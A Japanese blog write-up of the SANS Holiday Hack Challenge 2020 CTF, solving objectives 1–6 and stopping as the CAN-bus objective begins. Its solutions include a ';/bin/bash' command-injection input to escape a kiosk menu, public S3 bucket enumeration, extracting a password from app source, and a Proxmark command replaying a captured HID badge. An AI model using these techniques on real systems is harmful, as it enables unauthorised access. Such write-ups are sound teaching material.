SANS Holiday Hack Challenge 2020 Writeup

2020年12月14日ごろから2021年1月11に開催されていた、SANS Holiday Hack Challenge 2020のwriteupです。

SANS Holiday Hack Challengeとは

ただ問題をひたすら解いていくCTFではなく、ストーリーがあります。そのストーリーに沿った問題があるので、それらを解いていく形式になります。 メインとなるObjective問題と、そのObjective問題のヒントがもらえるターミナル問題があります。

ターミナル問題の一部は別にObjective問題のヒントではないものもあります。

今年のストーリーはこんな感じ

去年の悪役、Tooth Fairyの計画は彼女自身が考えたものではなくJack Frostによるものだった。
今年の悪役はこのJack Frostである。
サンタのKringlecon城は去年より拡張され、とてもにぎわっていた。
しかしサンタのふるまいはどこか変なところがあった。

ストーリーの概要やSANS Holiday Hack Challengeの概要はYoutubeにある通りなので、詳しく知りたい方はこちらへ

youtu.be

あとこのWriteupは端末問題をすべて解いてはいないです。メインに関連する端末問題は解きましたが、それ以外は忘れていました。 今年の私の目標がエンドロールを見ようとしていたので....

ここで書いていない端末問題の解答については、すべての問題を解いている素晴らしいWriteupを@kusuwada氏が書いているので、ぜひそちらもみましょう!!!

tech.kusuwada.com

Holiday Hack Challengeは今からでも解くことはできるので、面白そうと思った方はぜひ!!

Writeup

1) Uncover Santa's Gift List

Difficulty: 🎄
There is a photo of Santa's Desk on that billboard with his personal gift list. What gift is Santa planning on getting Josh Wright for the holidays? Talk to Jingle Ringford at the bottom of the mountain for advice.

サンタの机にある画像には贈り物のリストがあるが、Josh Wrightへの贈り物は何?という問題

オンラインで画像を編集できるサイトPhotopeaについてJingle Ringfordから教えてもらうので、そのツールを使って渦巻部分を元に戻す

またサンタの机の画像はJingle Ringforがいるエリアにある。

f:id:kataware8136:20210113232327p:plain
photo of Santa's Desk

渦巻の部分を投げ縄ツールで選択して、「フィルター」→「歪み」→「トール」で変更すると、Josh Wrightへの贈り物が何かわかる

f:id:kataware8136:20210113232445p:plain
贈り物のリスト

まだねじれが強いがproxmarkが回答

2) Investigate S3 Bucket

Difficulty: 🎄
When you unwrap the over-wrapped file, what text string is inside the package? Talk to Shinny Upatree in front of the castle for hints on this challenge.

パッケージの中の文字列は何?城の前にいるShinny Upatreeがこの問題のヒントをくれるよとのこと

そのShinny Upatreeのところへ行くとKringle KioskInvestiate S3 Bucketという端末が見つかる。

Shinny Upatreeと話すと、「Kringle Kioskにアクセスすると、地図やエルフがどこにいるか、あとバッチが手に入るよ。ただ何か問題があるよ」といわれるのでKringlecon Kioskを攻略する

Kringlecon Kiosk

Kringlecon Kioskにアクセスすると最初に但し書きの後に下のようなメニュー画面が表示される。1はお城のマップ、3はエルフの場所がわかるので、今後のためにテキストに落としておくと楽になった。

但し書きの部分にbashを動かしてみてとあるので、このメニューからbashを動かすことが目標だとわかる。

Welcome to our castle, we're so glad to have you with us!
Come and browse the kiosk; though our app's a bit suspicious.
Poke around, try running bash, please try to come discover,
Need our devs who made our app pull/patch to help recover?
Escape the menu by launching /bin/bash
Press enter to continue...

 Welcome to the North Pole!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Map
2. Code of Conduct and Terms of Use
3. Directory
4. Print Name Badge
5. Exit
Please select an item from the menu by entering a single number.
Anything else might have ... unintended consequences.
Enter choice [1 - 5] 

メニュー画面は1-5の入力しか受け付けず、何か悪さできそうなところないかなと探すと、「4. Print Name Badge」で名前を入力するところは自由に入力できるのでここを起点にbashを起動できないかと考える。

結論から言うと名前に;/bin/bashを入力すればOK。ここは受け取った名前をOSのコマンドとかで出力してるなら;を入れることで別のコマンドを受け付けないかなと試してみたら成功した。

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Welcome to the North Pole!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Map
2. Code of Conduct and Terms of Use
3. Directory
4. Print Name Badge
5. Exit
Please select an item from the menu by entering a single number.
Anything else might have ... unintended consequences.
Enter choice [1 - 5] 4
Enter your name (Please avoid special characters, they cause some weird errors)...;/bin/bash
 _______________________
< Santa's Little Helper >
 -----------------------
  \
   \   \_\_    _/_/
    \      \__/
           (oo)\_______
           (__)\       )\/\
               ||----w |
               ||     ||
   ___                                                      _    
  / __|   _  _     __      __      ___     ___     ___     | |   
  \__ \  | +| |   / _|    / _|    / -_)   (_-<    (_-<     |_|   
  |___/   \_,_|   \__|_   \__|_   \___|   /__/_   /__/_   _(_)_  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_| """ | 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
Type 'exit' to return to the menu.
shinny@559359319b4f:~$ 

bashを起動した後に、Shiny Upatreeに再度話しかけるとObjective2 のヒントがもらえる。

Investigate S3 Bucket

Investigate S3 Bucketの端末を開くとメッセージが出力され、かつファイルの中身を見てみるとTIPSがあるのでそちらも表示してみる。

するとこの問題は端末内で完結し、クラウドにデータアセットがあると教えてくれる。

Can you help me? Santa has been experimenting with new wrapping technology, and
we've run into a ribbon-curling nightmare!
We store our essential data assets in the cloud, and what a joy it's been!
Except I don't remember where, and the Wrapper3000 is on the fritz!
Can you find the missing package, and unwrap it all the way?
Hints: Use the file command to identify a file type. You can also examine
tool help using the man command. Search all man pages for a string such as
a file extension using the apropos command.
To see this help again, run cat /etc/motd.
elf@f1f2de7874aa:~$ ls
TIPS  bucket_finder
elf@f1f2de7874aa:~$ cat TIPS
# TIPS
- If you need an editor to create a file you can run nano (vim is also
  available).
- Everything you need to solve this challenge is provided in this terminal
  session.
elf@f1f2de7874aa:~$ 

次にbucket_finderディレクトリのREADMEを見てみると、S3の公開されているバケットを探してダウンロードするツールが用意されている。

このツール調べると公開されているツールのようで検索してみるとツールの使い方およびAmazonのS3 Bucketに関する解説も見つかる。

Blog, Whats in Amazon's buckets? - DigiNinja

上の記事を見るとS3のバケットのURLはリージョンとマッピングされており、アイルランドにあるバケットに対して、東京のURLでアクセスしてもリダイレクトしてくれるそうだ。

このツールはリダイレクト込みで、バケットが公開状態か非公開状態かを調べてくれ、また公開されているならダウンロードしてくれるツールということがわかる。

ここまでくればあとはS3バケットの名前を予測して、ツールを動かせばよい。最初に端末にアクセスした際に緑色の文字で表示されているWrapper3000というのが怪しそうなので、これをwordlistsに加えてツールを実行する。

※S3 のバケット名はすべて小文字なのでWは小文字にしておく

elf@f1f2de7874aa:~/bucket_finder$ cat wordlist 
kringlecastle
wrapper
santa
wrapper3000
elf@f1f2de7874aa:~/bucket_finder$ ./bucket_finder.rb --download --region us wordlist 
http://s3.amazonaws.com/kringlecastle
Bucket found but access denied: kringlecastle
http://s3.amazonaws.com/wrapper
Bucket found but access denied: wrapper
http://s3.amazonaws.com/santa
Bucket santa redirects to: santa.s3.amazonaws.com
http://santa.s3.amazonaws.com/
        Bucket found but access denied: santa
http://s3.amazonaws.com/wrapper3000
Bucket Found: wrapper3000 ( http://s3.amazonaws.com/wrapper3000 )
        <Downloaded> http://s3.amazonaws.com/wrapper3000/package
elf@f1f2de7874aa:~/bucket_finder$ ls
README  bucket_finder.rb  wordlist  wrapper3000
elf@f1f2de7874aa:~/bucket_finder$ 

公開されていたS3バケットが見つかり、中身を確認するとどうやらBase64っぽい文字列、でコードしたものをファイルに書き込むとzipファイルであることがわかる。

elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ cat package | base64 -d >> file.dat
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ file file.dat
file.dat: Zip archive data, at least v1.0 to extract
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ unzip file.dat
Archive:  file.dat
 extracting: package.txt.Z.xz.xxd.tar.bz2  

またunzipするとpackage.txt.Z.xz.xxd.tar.bz2というファイルが書き出される。まぁそれぞれの形式ででコードされているだろうと思われるので愚直に解答していく。

elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ tar -xvf package.txt.Z.xz.xxd.tar.bz2 
package.txt.Z.xz.xxd
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ xxd -r package.txt.Z.xz.xxd > package.txt.Z.xz
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ xz -d package.txt.Z.xz
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ uncompress package.txt.Z
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ cat package.txt
North Pole: The Frostiest Place on Earth

North Pole: The Frostiest Place on Earthが答え

3) Point-of-Sale Password Recovery

Difficulty: 🎄
Help Sugarplum Mary in the Courtyard find the supervisor password for the point-of-sale terminal. What's the password?

Sugarplum Maryのもとへ向かうとLinux PrimerSanta shopの端末がある。Linux Primerを解くとSanta shopのヒントがもらえるんだろうなと予想がつく

Linux Primer

起動するとmunchkinにLollipopを盗まれたので、munchkinを捕まえよう。hintmeと打つとヒントがもらえるよとある。

Linuxのコマンド関連の問題が出されて、それに対して答えていけばよい。

Q. Perform a directory listing of your home directory to find a munchkin and retrieve a lollipop!
$ ls
Q. Now find the munchkin inside the munchkin.
$ cat munchkin_19315479765589239
Q. Great, now remove the munchkin in your home directory.
$ rm munchkin_1931547976558923
Q. Print the present working directory using a command.
$ pwd
Q. Good job but it looks like another munchkin hid itself in you home directory. Find the hidden munchkin!
$ ls -la
Q. Excellent, now find the munchkin in your command history.
$ history
Q. Find the munchkin in your environment variables.
$ export
Q. Next, head into the workshop.
$ cd workshop
Q. A munchkin is hiding in one of the workshop toolboxes. Use "grep" while ignoring case to find which toolbox the munchkin is in.
$ grep -rni "munchkin" *
Q. A muchkin is blocking the lollipop_engine from starting. Run the lollipop_engine binary to retrieve this munchkin.
$ chmod +x lollipop_engine
$  ./lollipop_engine
Q. Munchkins have blown the fuses in /home/elf/workshop/electrical. cd into electrical and rename blown_fuse0 to fuse0.
$ cd electrical/
$ mv blown_fuse0 fuse0
Q. Now, make a symbolic link (symlink) named fuse1 that points to fuse0
$ ln -s fuse0 fuse1
Q. Make a copy of fuse1 named fuse2.
$ cp fuse1 fuse2
Q. We need to make sure munchkins don't come back. Add the characters "MUNCHKIN_REPELLENT" into the file fuse2.
$ echo "MUNCHKIN_REPELLENT"  >> fuse2
Q. Find the munchkin somewhere in /opt/munchkin_den
$  find ./ -iname '*munchkin*'
Q. Find the file somewhere in /opt/munchkin_den that is owned by the user munchkin.
$ id munchkin
uid=1052(munchkin) gid=1052(munchkin) groups=1052(munchkin)
$ find ./ -uid 1052
Q. Find the file created by munchkins that is greater than 108 kilobytes and less than 110 kilobytes located somewhere in /opt/munchkin_den.
$ find ./ -size -110k -size +108k
Q. List running processes to find another munchkin.
$ ps aux
Q. The 14516_munchkin process is listening on a tcp port. Use a command to have the only listening port display to the screen.
$ netstat -napt 80
Q. The service listening on port 54321 is an HTTP server. Interact with this server to retrieve the last munchkin.
$ curl localhost:54321
Q. Your final task is to stop the 14516_munchkin process to collect the remaining lollipops.
$ kill 23343
Congratulations, you caught all the munchkins and retrieved all the lollipops!
Type "exit" to close...

ここまでの問いに答えた後、Sugarplum Maryに話しかけるとヒントがもらえるようになる。

Santa shop

Santa shopの端末を開くとオフラインで使えるexeを渡される。これを適当な仮想マシンで実行してみるとどうやらSanta shopのインストーラであることがわかる。

インストールして、実行するとパスワードが要求される。

f:id:kataware8136:20210114233105p:plain
Santashop

アイコンからElectronで作ったアプリっぽいなと思ったが、Linux PrimerのヒントにもElectronのアプリとわかる。

またasarというツールを使うと、ソースコードがわかるということと使い方のガイドもヒントから分かった。

なのであとはソースコードを展開してみる。

C:\Users\user>cd C:\Users\user\AppData\Local\Programs\santa-shop

C:\Users\user\AppData\Local\Programs\santa-shop>cd resources

C:\Users\user\AppData\Local\Programs\santa-shop\resources>mkdir sourcecode

C:\Users\user\AppData\Local\Programs\santa-shop\resources>asar extract app.asar sourcecode

C:\Users\user\AppData\Local\Programs\santa-shop\resources>

展開されたのが下の図、この中のmain.jsを見るとパスワードが書いてある

santapass

f:id:kataware8136:20210114234029p:plain
SantaShopソース

4) Operate the Santavator

Difficulty: 🎄🎄
Talk to Pepper Minstix in the entryway to get some hints about the Santavator.

Pepper Minstixに話しかけてSantavatorのヒントをもらってくださいとある。

話しかけるとtmuxデタッチして困ってるといわれる。横の端末からアタッチしてあげればよさそう

Unescape Tmux

$ tmux ls
0: 1 windows (created Thu Jan 14 14:53:24 2021) [80x24]
$ tmux a -t 0
..............................'.''''''.'''''''''''''
.........................................'''''''''''
................................,:lccc:;,'...'''''''
.............................';loodxkkxxdlc;'..'''''
............................,:ccllcldx0dxxdoc..'''''
...........................;ccclooodkOkok0OOx:..''''
.........................':cccllodxxkkkOkxdxx;....''
........................,cccllooddxkOOOkOxoo'.....''
......................';:cclllccllodO0Okkkx;...'''..
.....................:llollclclccccclokc::'.........
...................;ddollllllllcccccccl;............
..................:xdooddoooolclllllolld;...........
.................'xxoodxxxdoooooooxkdooox'..........
.................,xxkxdxkkxxdddddddxkkxdxl....'.....
.................'xOkooddxkkxxdddxxkkxxxxx'.......'.
..................oOkddxkkkkdxxdddxxxxxxdd:......'.'
.................';k0xxkxxOxdddddoodxdxkkx:....'''''
................'',o0xdddxkxdxdodddddkkkxxc....'''''
................',,:OK0kkOOxddddxxxddxxkxd:'''''''''
.............',;:cccdKXKOkkOOxkxdxxxxxxkOx;'''''''''
...........:oxdddxkkxOXXOxxkxxkkkkkkkxxdxx,,''''''''
.......''':c:,..'coodOO00OOOO00kxOkK0KkO0d,,''''''''
...;cllc::clddooddOkxoccccccloddxxO0KK0KKOc:;,''''''
'ldolcc:::lldxkOxkO000OOOOkkxxdddxoooooooooodxxxddol
xxlcc:::::xolldddxOOdddxxxkkOOO0000000xkOkkxddoooooo
lo:::cccc::ldoodooxd,;lxxkkO0OOOOOOOOOOOOOO000000000
locclccccccccldkxdkk:,;cdxkOKXXXKKKKKXXKk::::cllodxk
xxollllcccllcodkOkO0:,,,:dkOOKKXXXKKKXXKl,,'''''''''
xxkolllllllllodkO0KO;,,,;;lxO00KKXKKKKK0c;,,,,,,,,,,
,dxxxdoooollodxk0KOolc:::::cdO00KK00K000c;,,,,,,,,,;
..:xkOOkdoxxkOO0OxoooooolooodxOO00Ok0kk0oc:;;;;;;;;;
....:dkOddOO0OkdoolllllloooddxOOOOOkkkkOdllccccccccc
You found her! Thank you!!!

この後に話しかけるとSantavatorを動かすにはカギと、赤、青、黄のバルブが必要だと教えてもらう。カギについてはSparkle Redberryに聞いてと言われる。

エレベータ前にいるSparkle Redberryに話しかけると、Santavatorの使い方を教えてくれる。光を操って緑、赤、黄の光を流し込めばよい

そのためにバルブが必要になる。このバルブはKringllecon Castleを散策してたら見つけたので、具体的にどこにあったかは忘れたが、緑のバルブはSantavatorを使わずとも入手でき、赤のバルブは緑を点灯した後に行けるTalksに、黄のバルブは赤と緑を点灯した後に行ける屋上かWorkshopにあった気がする。

あとは適当なオブジェクトも見つかるので、それらを駆使して点灯させる。

f:id:kataware8136:20210115000209p:plain
Santavator

これでクリア

5) Open HID Lock

Difficulty: 🎄🎄
Open the HID lock in the Workshop. Talk to Bushy Evergreen near the talk tracks for hints on this challenge. You may also visit Fitzy Shortstack in the kitchen for tips.

5問目はWorkshopのHIDロックを開けとあるが、Workshopのフロアにはボタンがなくて行けない。 しょうがないのでBushy Evergreen‘に会いに行ってヒントをもらうことにする。あとFitzy Shortstack`からも何かもらえるそうだ。

Speaker UNPrep

`Bushy Evergreen‘に会いに行くと、ドアを開けようとしているが、Alabaster Snonwballが作った問題が解けないとのこと。これは3問あるので順番に説いていく

1問目

./doorプログラムを実行するとパスワードを聞かれる。

$ ./door
You look at the screen. It wants a password. You roll your eyes - the 
password is probably stored right in the binary. There's gotta be a
tool for this...
What do you enter? > hello  
Checking......
Beep boop invalid password

適当に入力してもだめだがBushy Evergreenがバイナリの中の文字を見る方法は?みたいなことを言ってるのでstringsコマンドを使うとパスワードが見つかる

パスワードはOp3nTheD00r

2問目

1問目をクリアするとヒントをくれる。どうやらここでドアは空いてたらしいが私は気づかなかった。話の内容から電気もついてないので助けてみたいなことが書かれているので、今度はlightsプログラムに挑戦する。

$ ./lights 
The speaker unpreparedness room sure is dark, you're thinking (assuming
you've opened the door; otherwise, you wonder how dark it actually is)
You wonder how to turn the lights on? If only you had some kind of hin---
 >>> CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lights.conf
---t to help figure out the password... I guess you'll just have to make do!
The terminal just blinks: Welcome back, elf-technician
What do you enter? > hello
Checking......
Beep boop invalid password

lights.confを使っているようなので、そのlights.confを見てみる。

$ cat ./lights.conf 
password: E$ed633d885dcb9b2f3f0118361de4d57752712c27c5316a95d9e5e5b124
name: elf-technician

lights.confを見るとパスワードと名前がある。labディレクトリでlights.confを書き換えられるがここからどうしたらいいか結構悩んだ。

結論はlightc.confを下記のように設定して実行するとパスワード。 CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTEDというのが最大のヒントだった

~/lab $ cat lights.conf 
name: E$ed633d885dcb9b2f3f0118361de4d57752712c27c5316a95d9e5e5b124
password: elf-technician
~/lab $ ./lights
The speaker unpreparedness room sure is dark, you're thinking (assuming
you've opened the door; otherwise, you wonder how dark it actually is)
You wonder how to turn the lights on? If only you had some kind of hin---
 >>> CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lab/lights.conf
---t to help figure out the password... I guess you'll just have to make do!
The terminal just blinks: Welcome back, Computer-TurnLightsOn
What do you enter? > 

elf-technitianが表示されていた部分がComputer-TrunLightsOnと表示されている。要は名前やパスワードでなんか暗号化してるところを復号するので、名前とパスワードを入れ替えればパスワードがわかる。

$ ./lights
The speaker unpreparedness room sure is dark, you're thinking (assuming
you've opened the door; otherwise, you wonder how dark it actually is)
You wonder how to turn the lights on? If only you had some kind of hin---
 >>> CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lights.conf
---t to help figure out the password... I guess you'll just have to make do!
The terminal just blinks: Welcome back, elf-technician
What do you enter? > Computer-TurnLightsOn
Checking......
Lights on!

3問目

最後にvending machineに挑戦

labディレクトリにある、vendin_machine.confを削除して実行すると、名前とパスワードを入力し、パスワードに関しては暗号化されて出力される。 この暗号化の仕組みがわかれば答えが出せそう。

こちらもヒントをもらうとAAAAAAAAと入力してみるとどうなる?みたいなことを言われるので試してみるとA*10を試してみる。すると9文字以降は1文字目と一致する。8文字シフトの古典暗号、とわかれば後はマッピングを入手すればよい。Kringleconの端末でもPythonは使えるが、使いやすいわけではないのでマッピング表を基にプログラムを書いておしまい。

 ~/lab $ ./vending-machines 
The elves are hungry!
If the door's still closed or the lights are still off, you know because
you can hear them complaining about the turned-off vending machines!
You can probably make some friends if you can get them back on...
Loading configuration from: /home/elf/lab/vending-machines.json
I wonder what would happen if it couldn't find its config file? Maybe that's
something you could figure out in the lab...
ALERT! ALERT! Configuration file is missing! New Configuration File Creator Activated!
Please enter the name > hello
Please enter the password > AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJ
KKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUUVVVVVVVVWWWWWWWWXXXX
XXXXYYYYYYYYZZZZZZZZaaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiiiiiiijjjjjjjjkkkkkkkk
llllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyy
yyyy00000000111111112222222233333333444444445555555566666666777777778888888899999999
Welcome, hello! It looks like you want to turn the vending machines back on?
Please enter the vending-machine-back-on code > AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHH
HHHHIIIIIIIIJJJJJJJJKKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUU
VVVVVVVVWWWWWWWWXXXXXXXXYYYYYYYYZZZZZZZZaaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiii
iiiijjjjjjjjkkkkkkkkllllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvv
wwwwwwwwxxxxxxxxyyyyyyyy00000000111111112222222233333333444444445555555566666666777777778888888899999999
Checking......
That would have enabled the vending machines!
If you have the real password, be sure to run /home/elf/vending-machines
elf@b55d9572419c ~/lab $ cat ./vending-machines.json 
{
  "name": "hello",
  "password": "XiGRehmwDqTpKv7fLbn3UP9Wyv09iu8Qhxkr3zCnHYNNLCeOSFJGRBvYPBubpHYVzka18jGrEA24nILqF14D1GnMQKdxFbK363iZBrdjZE8IMJ3ZxlQsZ4Uisdwjup68mSyVX10sI2SHIMBo4gC7VyoGNp9Tg0akvHBEkVH5t4cXy3VpBslfGtSz0PHMxOl0rQKqjDq2KtqoNicv9VbtacpgGUVBfWhPe9ee6EERORLdlwWbwcZQAYue8wIUrf5xkyYSPafTnnUgokAhM0sw4eOCa8okTqy1o63i07r9fm6W7siFqMvusRQJbhE62XDBRjf2h24c1zM5H8XLYfX8vxPy5NAyqmsuA5PnWSbDcZRCdgTNCujcw9NmuGWzmnRAT7OlJK2X7D7acF1EiL5JQAMU3ehm9ZFH2rDO5LkIpWFLz5zSWJ1YbNtlgophDlgKdTzAYdIdjOx0OoJ6JItvtUjtVXmFSQw4lCgPE6x7"
map = "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJKKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUUVVVVVVVVWWWWWWWWXXXXXXXXYYYYYYYYZZZZZZZZaaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiiiiiiijjjjjjjjkkkkkkkkllllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyyyyyy00000000111111112222222233333333444444445555555566666666777777778888888899999999"
map_enc ="XiGRehmwDqTpKv7fLbn3UP9Wyv09iu8Qhxkr3zCnHYNNLCeOSFJGRBvYPBubpHYVzka18jGrEA24nILqF14D1GnMQKdxFbK363iZBrdjZE8IMJ3ZxlQsZ4Uisdwjup68mSyVX10sI2SHIMBo4gC7VyoGNp9Tg0akvHBEkVH5t4cXy3VpBslfGtSz0PHMxOl0rQKqjDq2KtqoNicv9VbtacpgGUVBfWhPe9ee6EERORLdlwWbwcZQAYue8wIUrf5xkyYSPafTnnUgokAhM0sw4eOCa8okTqy1o63i07r9fm6W7siFqMvusRQJbhE62XDBRjf2h24c1zM5H8XLYfX8vxPy5NAyqmsuA5PnWSbDcZRCdgTNCujcw9NmuGWzmnRAT7OlJK2X7D7acF1EiL5JQAMU3ehm9ZFH2rDO5LkIpWFLz5zSWJ1YbNtlgophDlgKdTzAYdIdjOx0OoJ6JItvtUjtVXmFSQw4lCgPE6x7"
map_lis = [map[i:i+8] for i in range(0,len(map),8)]
map_enc_lis = [map_enc[i:i+8] for i in range(0,len(map_enc),8)]
pass_enc = "LVEdQPpBwr"
ans_id = []
for i in range(len(pass_enc)):
    tmp = i % 8
    for j in map_enc_lis:
            if pass_enc[i] == j[tmp]:
                     ans_id.append(map_enc_lis.index(j))
ans = ""
for i in ans_id:
    ans += map_lis[i][0]
print(ans)
# CandyCane1

答えはCandyCane1

HID Unlock

ここまでの問題を解いたときに私は隣の扉に入れることに気づき、Workshopのエレベータのボタンを入手できた。これで挑戦権獲得である。

今度はWorkshopのエリアに移動するとWorkshopの部屋の扉が閉まっているため、この扉を開けるのかということがわかる。

Speaker Unprepの1問目doorをクリアすると、この問題を解くにはProxmark3というのが必要と言われている。いろいろ試していて分かったが、この問題はProxmarkを使ってドアを開けるコードをシミュレートする問題だった(最初は何をすればいいのかよくわからなかった)

Wrapping RoomにあるProxmark3端末を入手すると、Open Proxmark3 CLIから端末を開くことができる。

f:id:kataware8136:20210116085738p:plain
Proxmark3

ただこれだけではどうすればエミュレートできるかわからないので、Youtubeの動画を見る。

www.youtube.com

上記動画の13分くらいで、カードの読み取り方とシミュレートする方法がわかる。ここで、エルフが持ってるカードを読み取ってロックされたドアに対してシミュレートしてみればいいのかとわかる。

適当に探すと3人のカードを見つけれた。もっとあるかもしれないが、見つけたもので開いてしまったので、これ以上は探してない

#db# TAG ID: 2006e22f10 (6024) - Format Len: 26 bit - FC: 113 - Card: 6024
#db# TAG ID: 2006e22f0e (6023) - Format Len: 26 bit - FC: 113 - Card: 6023
#db# TAG ID: 2006e22f0d (6022) - Format Len: 26 bit - FC: 113 - Card: 6022

Workshopの扉の近くで lf hid sim -r 2006e22f0e --fc 113 --cn 6023 のコマンドを打つと、隣の扉が開いた。

扉の奥へ進むと、サンタになれた。

f:id:kataware8136:20210116091356p:plain
Santa

なるほどね、いくつかサンタじゃないと触っちゃいけないオブジェクトがあるってメッセージが出たので、ここからはサンタを操っていくのか。

あ、プロローグでサンタの動きがおかしいってエルフが言ってたのはプレイヤーがサンタを操るからかな?

6) Splunk Challenge

Difficulty: 🎄🎄🎄
Access the Splunk terminal in the Great Room. What is the name of the adversary group that Santa feared would attack KringleCon?

Great RoomにあるSplunkのターミナルにアクセスしてサンタがKringleConを攻撃すると思ってる攻撃者グループの名前を当てろということだ。

Santaでないときには触れなかったSplunkのターミナルが開けるようになっていて、開くとTraining QuestionとChallenge Questionが表示された。

Training Questionから解いていく。問題に関してSplunkで検索してその答えを書いていけばよいっぽい。 問題が多いので、実際はいろいろクエリを検索して進めたが、答えと回答でさくっと書いていく。

Q1. How many distinct MITRE ATT&CK techniques did Alice emulate?

| tstats count where index=* by index 
| search index=T*-win OR T*-main
| rex field=index "(?<technique>t\d+)[\.\-].0*" 
| stats dc(technique)

答え:13

Q2. What are the names of the two indexes that contain the results of emulating Enterprise ATT&CK technique 1059.003? (Put them in alphabetical order and separate them with a space)

| tstats count where index=t1059.003* by index 

答え:t1059.003-main t1059.003-win

Q3. One technique that Santa had us simulate deals with 'system information discovery'. What is the full name of the registry key that is queried to determine the MachineGuid?

これはGithubページを見るとわかる。

答え:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography

Q4. According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp.)

OSTAPが関係しているものを答えろとのことなので、OSTAPで検索して、一番古いのを答える。

index = attack
| search "Test Name" = OSTAP*

答え:2020-11-30T17:44:15Z

Q5. One Atomic Red Team test executed by the Attack Range makes use of an open source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?

問題にあるGithubのコードをみるとWindowsAudioDevice-Powershell-Cmdletというコマンドが見つかるので、それで検索する。

index=T1123*
| search EventCode=1
| search WindowsAudioDevice-Powershell-Cmdlet

答え:3648

Q6. Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?

レジストリキーに関する攻撃はT1547ということが調べるとわかる。あとはRgistryにまつわるSysmonのイベントID13で検索してみる。

index = T1547*
| search EventCode=13

すると下記のコマンドを実行してることがわかるので、実際に見てみて最後のコマンドを入力すればよし。 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat

回答:quser

Q 7. According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?

アリスからのヒントをもらえるので、それをいじったクエリを実行。大量の結果が出るが一つ目のcertificate.issuerにwin-dc-748.attackrange.localとあり、これが合致しそうと考え入力したら正解した。

index=* sourcetype=bro* "certificate.serial"=*
{ [-]
   certificate.exponent: 65537
   certificate.issuer: CN=win-dc-748.attackrange.local
   certificate.key_alg: rsaEncryption
   certificate.key_length: 2048
   certificate.key_type: rsa
   certificate.not_valid_after: 2021-05-29T01:08:57.000000Z
   certificate.not_valid_before: 2020-11-27T01:08:57.000000Z
   certificate.serial: 55FCEEBB21270D9249E86F4B9DC7AA60
   certificate.sig_alg: sha256WithRSAEncryption
   certificate.subject: CN=win-dc-748.attackrange.local
   certificate.version: 3
   id: Fen0DH2KtOxQwt4BFk
   ts: 2020-11-30T21:03:50.409634Z
}

答え:55FCEEBB21270D9249E86F4B9DC7AA60

Challenge Q. What is the name of the adversary group that Santa feared would attack KringleCon?

ここまでの問題を解くとBase64エンコードされた暗号化文字列7FXjP1lyfKbyDK/MChyf36h7をアリスが教えてくれる。これをデコードしたら攻撃グループがわかりそう。

ちなみに暗号はRFC7465ということまで教えてくれる。これはRC4なので、あとはパスワードを探す。 パスワードはサンタのお気に入りのフレーズということでいろんな人に話しかけるとBubble LightingtonからStay frostyというキーワードをもらう。 これであとはCyberchefで復号すると答え

回答:The Lollipop Guild

7) Solve the Sleigh's CAN-D-BUS Problem

Difficulty: 🎄🎄🎄
Jack Frost is somehow inserting malicious messages onto the sleigh's CAN-D bus. We need you to exclude the malicious messages and no others to fix the sleigh. Visit the NetWars room on the roof and talk to Wunorse Openslae for hints.

Can-D-BUSということなので、車関連のネットワーク問題かな推測。 ひとまずNetWar Roomに移動し、CAN-Bus Investigationという端末問題があるので解いていく。

CAN-Bus Investigation

端末を起動すると、下記のメッセージが出力される。またログを確認するとそれっぽいログが記録されている。

